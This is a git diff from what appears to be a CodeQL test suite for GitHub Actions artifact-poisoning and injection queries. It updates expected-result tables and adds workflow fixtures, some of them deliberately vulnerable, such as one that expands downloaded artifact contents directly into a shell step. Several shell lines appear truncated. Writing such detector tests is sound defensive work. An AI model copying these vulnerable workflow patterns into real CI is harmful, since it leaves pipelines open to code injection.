@@ -728,8 +735,10 @@ cfgNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -808,7 +817,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -867,8 +876,10 @@ dfNodes | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -949,7 +960,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:40:74 | .github/workflows/poisonable_steps.yml@5:5:40:74 | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | 
@@ -1008,8 +1019,10 @@ nodeLocations | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | 
@@ -1030,7 +1043,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | @@ -1052,6 +1065,10 @@ sources | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 8475711949f..5cf7bbd4e6b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml 
@@ -21,69 +21,8 @@ jobs: id: pr run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - - name: The job failed - if: ${{ failure() }} - uses: actions-cool/maintain-one-comment@v1.2.1 - with: - token: ${{ secrets.GITHUB_TOKEN }} - body: | - 😭 Deploy PR Preview failed. - - - - - body-include: '' - number: ${{ steps.pr.outputs.id }} - - failed: - runs-on: ubuntu-latest - if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' - steps: - - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: pr - - - name: save PR id - id: pr - run: echo "::set-output name=id::$( - - - body-include: '' - number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml new file mode 100644 index 00000000000..633c45661e5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml 
@@ -0,0 +1,23 @@
+# It consumes an artifact produced by the First Workflow
+
+on: workflow_run
+jobs:
+ my-second-job:
+ runs-on: ubuntu-latest
+ steps:
+ - name: download pr artifact
+ uses: dawidd6/action-download-artifact@v2
+ with:
+ workflow: ${{github.event.workflow_run.workflow_id}}
+ run_id: ${{github.event.workflow_run.id}}
+ name: artifact
+
+ # Save PR id to output
+ - name: Save artifact data
+ id: artifact
+ uses: juliangruber/read-file-action@v1
+ with:
+ path: ./artifact.txt
+ - name: Use artifact
+ run: echo ${{ steps.artifact.outputs.contents }}
+
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
new file mode 100644
index 00000000000..92c4be4a9e8
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml
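Review bot: The comment `# Save PR id to output` in the new artifactpoisoning5.yml fixture does not describe the step under it: `Save artifact data` reads `./artifact.txt` through `juliangruber/read-file-action@v1` and exposes it as `steps.artifact.outputs.contents`, and no PR id appears anywhere in this file. Because the fixture lives under the CWE-094 tests, the last step, `run: echo ${{ steps.artifact.outputs.contents }}`, is presumably the intended sink, where the contents of an artifact downloaded in a `workflow_run` context are expanded into the shell script text before it runs. I would reword the comment in place, for example `# Read the downloaded artifact into a step output (untrusted content)`, which keeps line numbers unchanged so the recorded locations in the .expected files stay valid. The header comment also refers to a "First Workflow" that is not named; naming the producing workflow there would make the fixture self-explanatory.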
@@ -0,0 +1,30 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: artifact + run: | + echo "::set-output name=pr_number::$( bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | 
@@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | 
semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | 
@@ -42,11 +40,12 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | 
@@ -58,3 +57,4 @@ subpaths | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 18ad272f803..57d7ff9d64b 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,7 +1,6 @@ edges -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | 
@@ -13,13 +12,12 @@ edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | nodes -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | semmle.label | python foo/x.py | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | 
semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | @@ -42,5 +40,7 @@ nodes | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 41c465dcc27..70eb169860e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,9 +1,8 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning7.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning7.yml:9:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning8.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses 
